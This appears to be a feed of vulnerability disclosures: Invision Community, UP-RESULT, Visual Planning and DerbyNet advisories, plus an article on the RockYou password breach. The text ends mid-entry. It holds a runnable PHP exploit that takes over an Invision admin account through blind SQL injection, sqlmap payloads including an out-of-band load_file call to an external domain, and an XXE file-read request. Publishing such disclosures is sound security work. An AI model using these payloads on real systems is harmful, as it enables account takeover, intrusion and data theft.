Invision Community versions 4.4.0 through 4.7.15 suffer from a remote SQL injection vulnerability in store.php.

--------------------------------------------------------------------  
Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
--------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

All versions from 4.4.0 to 4.7.15.

[-] Vulnerability Description:

The vulnerability is located in the  
/applications/nexus/modules/front/store/store.php script.  
Specifically, into the  
IPS\nexus\modules\front\store\_store::_categoryView() method:

126 /* Apply Filters */  
127 if ( isset( \IPS\Request::i()->filter ) and \is_array(  
\IPS\Request::i()->filter ) )  
128 {  
129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );  
130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )  
131 {  
132 $where[] = array( \IPS\Db::i()->findInSet(  
"filter{$filterId}.pfm_values", array_map( 'intval', explode( ',',  
$allowedValues ) ) ) );  
133 $joins[] = array( 'table' => array( 'nexus_package_filters_map',  
"filter{$filterId}" ), 'on' => array(  
"filter{$filterId}.pfm_package=p_id AND  
filter{$filterId}.pfm_filter=?", $filterId ) );  
134 }  
135 }

User input passed through the "filter" request parameter is not  
properly sanitized before being  
assigned to the $where and $joins variables (lines 132 and 133), which  
are later used to execute  
some SQL queries. This can be exploited by unauthenticated attackers  
to carry out time-based or  
error-based Blind SQL Injection attacks. Subsequently, this might also  
be exploited to reset  
users' passwords and gain unauthorized access to the AdminCP, in order  
to achieve  
Remote Code Execution (RCE). Successful exploitation of this  
vulnerability requires  
the nexus application to be installed and configured with one "Product  
Group" at least.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-30163.php

[-] Solution:

Upgrade to version 4.7.16 or later.

[-] Disclosure Timeline:

[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure  
[12/03/2024] - Version 4.7.16 released  
[20/03/2024] - CVE identifier requested  
[24/03/2024] - CVE identifier assigned  
[05/04/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2024-30163 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://invisioncommunity.com/release-notes/4716-r128/  
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-02

-----------------------  
PoC:

<?php

/*  
    --------------------------------------------------------------------  
    Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
    --------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.  
    Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user  
    input passed through the "filter" request parameter is not properly sanitized before being  
    assigned to the $where and $joins variables, which are later used to execute some SQL  
    queries. This can be exploited by unauthenticated attackers to carry out time-based  
    or error-based SQL Injection attacks.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2024-02  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

$url = $argv[1];  
$ch  = curl_init();  
$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");

function sql_injection($sql)  
{  
  global $ch, $sec;

  $min = true;  
  $idx = 1;

  while(1)  
  {  
    $test = 256;

    for ($i = 7; $i >= 0; $i--)  
    {  
      $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));  
      $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";  
      curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));  
      $start = time(); curl_exec($ch); $secs = time() - $start;  
      $min = ($secs < $sec);  
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;  
    $data .= chr($chr); $min = true; $idx++;  
    print "\r[*] Data: {$data}";  
  }

  return $data;  
}

print "[+] Step 1: fetching admin's e-mail address\n";

$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";

fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";

$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";

@unlink('./cookies.txt');

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");  
curl_setopt($ch, CURLOPT_POST, false);  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$passwd = md5(time());  
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");

print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";

Invision Community 4.7.15 SQL Injection

UP-RESULT version 0.1 2024 suffers from a remote SQL injection vulnerability.

    ## Title: upresult_0.1-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 04/08/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The nid parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'was submitted in the nid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECTNULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)## Time spent:00:15:00

UP-RESULT 0.1 2024 SQL Injection

By Daily Contributors
Today over at Resonance Security I am going to look at one of the more unusual ways in…
This is a post from HackRead.com Read the original post: The Legacy of a Security Breach

This article was authored and contributed by Keir Finlow-Bates, a passionate blockchain enthusiast and technologist.

Today over at Resonance Security I am going to look at one of the more unusual ways in which your approach to computer security can lead to an increase in public awareness of your company.

There are many motivations for starting a company: becoming wealthy, doing something interesting and useful, and leaving some kind of legacy or mark on history are three of the main ones that spring to mind.

About that legacy: imagine having the name of your corporation attached to a file representing one of the most significant hacks of the 21st century!

That’s quite notable, but probably not what the founders of one particular company were looking for with their startup.

****We won’t rock you****

In the middle of the 2000s, RockYou, Inc. was doing well as a widget-maker for social media companies like MySpace and Facebook. However, back in 2009, it suffered a data breach in which a hacker discovered an SQL database server with an unpatched ten-year-old bug, the database containing over 32 million usernames and passwords for user accounts.

That’s right — 32 million usernames, and their associated passwords. For comparison, that’s about 10% of the active monthly users that Facebook had at the time.

The passwords were stored in plain text.

****Mud on your face, big disgrace****

Not only did RockYou initially fail to notify their users, but it subsequently released a falsified official statement claiming that the breach was less severe than it was.

To be clear: it was a very, very serious breach.

A decade and a half ago, people were far worse at password security than they are now. Password managers were almost unheard of, for some unexplained bizarre reason some sites blocked the use of password managers for unspecified “security reasons”, and two-factor authentication was pretty much only affordable and available to business users.

Because people were told not to write down their passwords, this meant that most of the leaked credentials were being used on other websites. After all, who in their right mind is going to memorize twenty or thirty different random passwords? As a result, sites such as banks, online stores, health databases, social media, supposedly private online journals, and online games held accounts using the same passwords.

****The legacy****

For years the full list of RockYou passwords has been available to download by anyone. It is typically found in a file called rockyou.txt , and there are plenty of GitHub repositories out there where you can find it.

In Kali Linux, a Linux distribution designed and produced specifically for penetration testing, the RockYou text file is included during the installation by default.

****Conclusion****

Just imagine — with a little bit of security carelessness, you too can take your modestly successful company and in the process of destroying it, allow its name to live on forever.

Have we learned anything since 2009? Not always.

For example: in 2017 it was revealed that an old social media site called LiveJournal, dating back to the 90s (but still running to this day), suffered a breach in which 26 million unique usernames, email addresses, and plaintext passwords were extracted. It took them until 2019 to admit to the breach.

That’s right — passwords were still being stored in plaintext in 2017, and I would bet good money on there being more sites out are doing the same, even though we are a decade and a half on from the original RockYou breach.

I predict that the leakage of passwords will only end once we stop using passwords, and start using improved systems such as security keys and self-managed identity for our authentication systems.

In the meantime, you have to assume that any password you provide to a website will eventually be leaked, therefore:

*   use a password manager to generate long, random, unique passwords for your accounts,
*   protect access to the password manager with two-factor authentication, and
*   make sure the password you use for your password manager has never been used anywhere else.

****Post-script****

Don’t run off and look for a website that allows you to enter your password and see if it was ever revealed in a breach! I can guarantee it will be a phishing site. Instead, I recommend HaveIBeenPwned, where you can type in your email address, and retrieve a list of the companies and websites that have managed to leak your credentials to the dark web through bad security practices. Another option is the Resonance Data Leak Detector, which monitors if your credentials have been leaked 24/7 and automatically notifies you.

****About Resonance Security****

Resonance Security is a curated platform for end-to-end cybersecurity products and services. It functions as a concierge for your organization’s end-to-end cyber-security needs, aggregating valuable security offerings into one platform to spread awareness on what it takes to secure your technology stack end-to-end.

I’m Keir Finlow-Bates, often known as Blockchain Gandalf, and am primarily a blockchain researcher and inventor. I started on this journey in late 2010 by examining the original Bitcoin code, and have been obsessed with blockchain ever since.

I am also the author of two books on the topic: Move Over Brokers Here Comes The Blockchain, explaining blockchain, and Evil Tokenomics, illustrating through practical examples how web3 scams work. You can find more at my website: Thinklair.com

1.  The Forgotten Victims of Data Breach
2.  Solving the Cyber Security Problem: Mission Impossible
3.  Will good prevail over bad as bots battle for the internet?
4.  If a Cyber Security Report Falls in a Forest, Is Anyone Listening?

The Legacy of a Security Breach

Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system. All versions prior to Visual Planning 8 (Build 240207) are affected.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in   
Visual Planning

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49234

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

Authenticated attackers can exploit a weakness in the XML parser   
functionality of the Visual Planning[0] application in order to obtain   
read access to arbitrary files on the application server. Depending on   
configured access permissions, this vulnerability could be used by an   
attacker to exfiltrate secrets stored on the local file system.

Risk  
====

An attacker can use the vulnerability to gather information and   
depending on the stored data, exfiltrate secrets from the file system.   
Furthermore, HTTP requests can be used for out-of-bands exfiltration and   
possibly server side request forgery (SSRF) attacks.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an arbitrary file read vulnerability via XML external entities in Visual   
Planning.  
The application Admin Center (vpadmin) communicates with the server   
through an XML-based protocol that utilizes proprietary compression   
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom   
proxy as part of an assessment in order to intercept and manipulate the   
messages exchanged between application and server.

One of the messages sent by the Admin Center application after   
authentication is the following:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.parameters.GetApplicationProperty>  
<defaultValue>

</defaultValue>  
<propertyName>PWD</propertyName>  
<rawResult>false</rawResult>  
<section>INSTALLDATA</section>  
<userSession isNull="true"/>  
</com.visualplanning.query.parameters.GetApplicationProperty>

The method GetApplicationProperty is called to request the value of the   
property PWD. The server responds with an XML message, where the value   
element contains the response of the query:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.result.ApplicationPropertyResult>  
<resultValues/>  
<status>OK</status>  
<value>

</value>  
</com.visualplanning.query.result.ApplicationPropertyResult>

In this response it was observed that if the requested property value   
could not be resolved, the content of the request element defaultValue   
will be reflected as part of the response, making it a suitable back   
channel for XML external entity (XXE) injections.

The following message was sent to the Visual Planning application:

<?xml version="1.0" encoding="UTF-8"?>  
<!DOCTYPE foo [<!ENTITY example SYSTEM   
"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>  
<com.visualplanning.query.parameters.GetApplicationProperty>  
<defaultValue>&example;</defaultValue>  
<propertyName>ShowBackground</propertyName>  
<rawResult>false</rawResult>  
<section>Application</section>  
<userSession isNull="true"/>  
</com.visualplanning.query.parameters.GetApplicationProperty>

The server responds with the content of the requested install.properties   
file inside the value element, thus confirming the XML parser is   
vulnerable to XML external entity (XXE) injections:

<?xml version="1.0" encoding="UTF-8"?>  
<com.visualplanning.query.result.ApplicationPropertyResult>  
<resultValues/>  
<status>OK</status>  
<value>#  
#Tue Oct 03 15:37:33 CEST 2023  
INSTALLDATA.INSTALLSERIAL=  
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning  
INSTALLDATA.OK=Next  
INSTALLDATA.PAGE=PROVIDER  
INSTALLDATA.POOLMODE=1  
INSTALLDATA.PORT=3306  
INSTALLDATA.PROVIDERTYPE=MySQL  
INSTALLDATA.PWD=ENCODE\:  
INSTALLDATA.SERVER=127.0.0.1  
INSTALLDATA.SERVERLANG=de  
INSTALLDATA.USER=root  
INSTALLDATA.VIEWERSERIAL=  
</value>  
</com.visualplanning.query.result.ApplicationPropertyResult>

Further testing showed that out-of-bands exfiltration via HTTPS requests   
is also generally possible.

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered during an assessment by Lennert Preuth   
and David Brown of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6  
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM  
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm  
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO  
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21  
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN  
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9  
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d  
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/  
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML  
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz  
mZ2yA2/9ZfQwOawEirQtQr8=  
=TUGM  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Visual Planning 8 Arbitrary File Read

A wildcard injection inside a prepared SQL statement was found in an undocumented Visual Planning 8 REST API route. The combination of fuzzy matching (via LIKE operator) and user-controlled input allows exfiltrating the REST API key based on distinguishable server responses. If exploited, attackers are able to gain administrative access to the REST API version 2.0.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

Title  
=====

SCHUTZWERK-SA-2023-003: Authentication Bypass in Visual Planning REST API

Status  
======

PUBLISHED

Version  
=======

1.0

CVE reference  
=============

CVE-2023-49231

Link  
====

https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-003/

Text-only version:  
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-003.txt

Affected products/vendor  
========================

All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.

Summary  
=======

A wildcard injection inside a prepared SQL statement was found in an   
undocumented Visual Planning[0] 8 REST API route. The combination of   
fuzzy matching (via LIKE operator) and user-controlled input allows   
exfiltrating the REST API key based on distinguishable server responses.   
If exploited, attackers are able to gain administrative access to the   
REST API v2.0.

Risk  
====

The vulnerability allows attackers to obtain a valid API key for the   
Visual Planning REST API v2.0. With such a key, attackers can use   
corresponding endpoints to exfiltrate company data or upload/download   
files. If no external user management (e.g. LDAP) is configured, the API   
key can also be used for user management tasks including the creation of   
administrative users. Since administrators are allowed to upload modules   
using the Visual Planning Admin Center, a compromise of the underlying   
server is likely.

Description  
===========

During a recent red teaming assessment, Visual Planning was identified   
as part of the customers internet-facing assets. The software is   
developed by STILOG I.S.T. and provides resource management and   
scheduling features. A security assessment conducted by SCHUTZWERK found   
an authentication bypass in Visual Planning's administrative REST API   
v2.0.[1]

Corresponding API routes are implemented in the PlanningWSRestV2.java   
file. A comparison between the documentation and implemented routes   
revealed an undocumented route (documentation accessed on 2024-03-05),   
which is externally reachable via a GET request to the /session endpoint.

The following code snippet shows the corresponding undocumented route,   
which takes the value of the apikey header as an argument:

vp.jar.src/com/visualplanning/webservice/PlanningWSRestV2.java  
/*      */   @GET  
/*      */   @Path("/session")  
/*      */   public Response openSession(@HeaderParam("apikey") String   
apikey, @HeaderParam("keepalive") String keepalive) {  
/*  123 */     if (apikey == null || apikey.trim().isEmpty()) {  
/*  124 */       return   
WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN,   
apikey);  
/*      */     }  
/*      */  
/*  127 */     WSSession session = WSSession.existsSession(apikey);  
/*  128 */     if (session != null) {  
/*  129 */       return   
WSResponse.instance().error((Response.StatusType)Response.Status.FORBIDDEN,   
"Already opened session for apikey : ", apikey);  
/*      */     }  
/*      */  
/*  132 */     if (WSSession.getSession(apikey, (keepalive != null &&   
Boolean.parseBoolean(keepalive) == true)) == null) {  
/*  133 */       return   
WSResponse.instance().errorApikey((Response.StatusType)Response.Status.FORBIDDEN,   
apikey);  
/*      */     }  
/*  135 */     return WSResponse.instance().success("WSSession created   
for apikey : " + apikey);  
/*      */   }

Line 132 shows a call to the getSession(apikey, ...) method of the   
WSSession class. Subsequently, the getSession(..) method will call the   
makeSession(apikey, ..) method of the same class.

The following code snippet shows the makeSession(..) method. Line 646   
contains the vulnerable prepared SQL statement, which is prone to   
wildcard injections[2] due to the usage of the LIKE operator in   
combination with user-controlled input:

vp.jar.src/com/visualplanning/webservice/WSSession.java  
/*      */   private static WSSession makeSession(String apiKey,   
WSSessionType type) {  
/*  634 */     WSSession wsSession = new WSSession();  
/*  635 */     WebApplicationContext applicationContext =   
WebApplicationContext.getDefaultApplication();  
/*  636 */     UserSession userSession =   
applicationContext.createUserSession();  
/*      */  
/*  638 */     DBConnection connection =   
applicationContext.createUserSession().getDBConnection();  
/*  639 */     String databaseName =   
applicationContext.getProperty("Application", "Databasename",   
"VisualPlanning7");  
/*      */  
/*  641 */     connection.setPoolMode(false);  
/*  642 */     connection.setDatabase(databaseName);  
/*      */  
/*      */     try {  
/*  645 */       if (type == WSSessionType.CLIENT) {  
/*  646 */         String planningQuery = "SELECT XMLContent FROM   
Planning WHERE XMLContent LIKE ?";  
/*  647 */         PreparedStatement stmt =   
connection.createPreparedStatement(planningQuery);  
/*  648 */         stmt.setString(1, "%<APIKey>" + apiKey + "</APIKey>%");  
/*  649 */         ResultSet rs = stmt.executeQuery();  
/*      */  
/*  651 */         if (!rs.next()) {  
/*  652 */           return null;  
/*      */         }

The following GET request demonstrates the behavior of injecting a   
percent sign as wildcard character:

GET /vplanning/api/v2/session HTTP/1.1  
Host: vp-host  
apikey: %  
[..]

The server will respond with a success message, indicating that a   
session was created for the used API key:

HTTP/1.1 200  
[..]

WSSession created for apikey : %

Further tests showed that an apikey header payload of '1%' will result   
in a similar success response, if the api key starts with the character   
'1'. A payload with a different non-matching first apikey character like   
'2%' will result in a status code 403 and the error message 'Invalid API   
key (2%)'.

The proof-of-concept script brute_vp_apikey.py[3] was developed in order   
to automate the process of exfiltrating the full apikey. The script can   
be executed as follows against a vulnerable Visual Planning instance and   
to extract the administrative api key:

$ python3 brute_vp_apikey.py --url http://127.0.0.1:8080  
Visual Planning API Key: 79d4add3-6995-8cae-976b-4aaaddd90616

Solution/Mitigation  
===================

The vendor suggests to update to Visual Planning 8 (Build 240207)

Disclosure timeline  
===================

2023-11-01: Vulnerability discovered  
2023-11-09: Contact vendor in order to determine security contact  
2023-11-10: Received generic sales response from vendor  
2023-11-14: Contacted CTO of vendor directly  
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor  
2023-11-24: CVE assigned by Mitre  
2023-11-24: Additional technical details provided to vendor  
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings   
is in progress  
2024-01-30: Inquired about mitigation status regarding the reported   
vulnerabilities  
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were   
already fixed  
2024-03-08: Sent advisory drafts to vendor  
2024-03-28: Received patch information and release of advisory

Contact/Credits  
===============

The vulnerability was discovered by Lennert Preuth of SCHUTZWERK GmbH.

References  
==========

[0] https://www.visual-planning.com/en/  
[1]   
https://app.swaggerhub.com/apis-docs/VisualPlanning/visual-planning_api_rest_v_2_0_us/2.0-oas3  
[2]   
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#sql-wildcard-injection  
[3] https://www.schutzwerk.com/en/43/assets/advisories/brute_vp_apikey.py

Disclaimer  
==========

The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The   
most recent version of this security advisory can be found at SCHUTZWERK   
GmbH's website ( https://www.schutzwerk.com ).

Additional information  
======================

SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/

SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/  
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0QkaHGFkdmlzb3Jp  
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrvAZhAArh5MI5kM1lTjcIPPMiDS  
VXJ51Z39qgcXySyrqrKslnP/2a/pfpakD8g161oOTSK/tt9Yd6L/6O5Vywe7Kx5V  
lkVw7bs9J0WCY8aYzJ9RxdALt7HexAG+USgbjFWFajdSNNJ8giBu3P3ZCE8/GbHJ  
0bKd8AN88NKL954olnI6qGbbnOr/QXWuIOWAYF9wXLgEk992hszYgt7SJIrFHuX6  
2TC4iWOv4+72HQiQ8QYXCAZZVBDr3mUPQRBSJ9AZ3x7mxtJtMg8DyW0OATNe9Qlq  
IUO7HFqrPwTQmFKf9whk8QD7/Y9dKTpAjlVzvXe49COqbjOzxmIe7muxwyVlOrqO  
J9ZqreOr/ENLUgYDBaTLSTAHdEFNeqRGPK3dG0yiRSi3dtavJwr8PN1L52qTqLzT  
C+Yrruu6Ac6pSin1Ea9WaXF+YS1ErRcbZxkRD5pS4s6V4NMkV4bDWlDtraQ0rDfL  
AA+TxtA25p34S2MV/b3qAiA66UjrXEb6IJVNx4Rx7X3+gcLgI2w7t3DQEVuPaB3k  
ltT1oV6ei7tqeQpn7usHzlfa6lq7Q3PIRpxYAo0g4kp4cVVblLRNWDpZMK+cBj1N  
MrGP2f50gbpYej/yYHsXNU2pMfbUPoSq3X8uwVCoLvaBSBWx7I3TM1hl0/3wBi/w  
phO+Bauh2QYGX2mFw/mduZM=  
=ycwQ  
-----END PGP SIGNATURE-----

--   
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany  
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories@schutzwerk.com / www.schutzwerk.com

Geschäftsführer / Managing Directors:  
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm / HRB 727391  
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

Visual Planning REST API 2.0 Authentication Bypass

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/racer.inc.

CVE ID: CVE-2024-30923

Description:  
An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, specifically within the `print/render/racer.inc` component. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting improper sanitization of the `where` clause in Racer Document Rendering.

Vulnerability Type: SQL Injection

Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet

Affected Product Code Base: DerbyNet - v9.0

Affected Component: print/render/racer.inc

Attack Type: Remote

Impact:  
- Code execution: True  
- Information Disclosure: True

Attack Vectors:  
The vulnerability is present in the `print/render/racer.inc` component of DerbyNet, due to insufficient sanitization of the `where` parameter within the URL. Attackers can manipulate SQL queries by injecting malicious SQL commands through the `where` parameter, as demonstrated in the following URL:  
- `http://127.0.0.1:8000/render-document.php/award/GoldCupAwardDocument?where=1`

This manipulation could lead to unauthorized access to database information and potential code execution on the server hosting the application.

Discoverer: Valentin Lobstein

References:  
- Official website: http://derbynet.com  
- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 print/render/racer.inc SQL Injection

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/award.inc.

    CVE ID: CVE-2024-30922Description:A SQL Injection vulnerability has been identified in DerbyNet version 9.0, specifically affecting the 'where' clause in Award Document Rendering through the component `print/render/award.inc`. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information without requiring authentication.Vulnerability Type: SQL InjectionVendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynetAffected Product Code Base: DerbyNet - v9.0Affected Component: print/render/award.incAttack Type: RemoteImpact:- Code execution: True- Information Disclosure: TrueAttack Vectors:The vulnerability in the document rendering endpoint, particularly within `print/render/award.inc`, is exposed to an unauthenticated SQL Injection. This flaw allows attackers to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access and manipulation.Discoverer: Valentin LobsteinReferences:- Official website: http://derbynet.com- Source code on GitHub: https://github.com/jeffpiazza/derbynet

DerbyNet 9.0 print/render/award.inc SQL Injection

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in ajax/query.slide.next.inc.

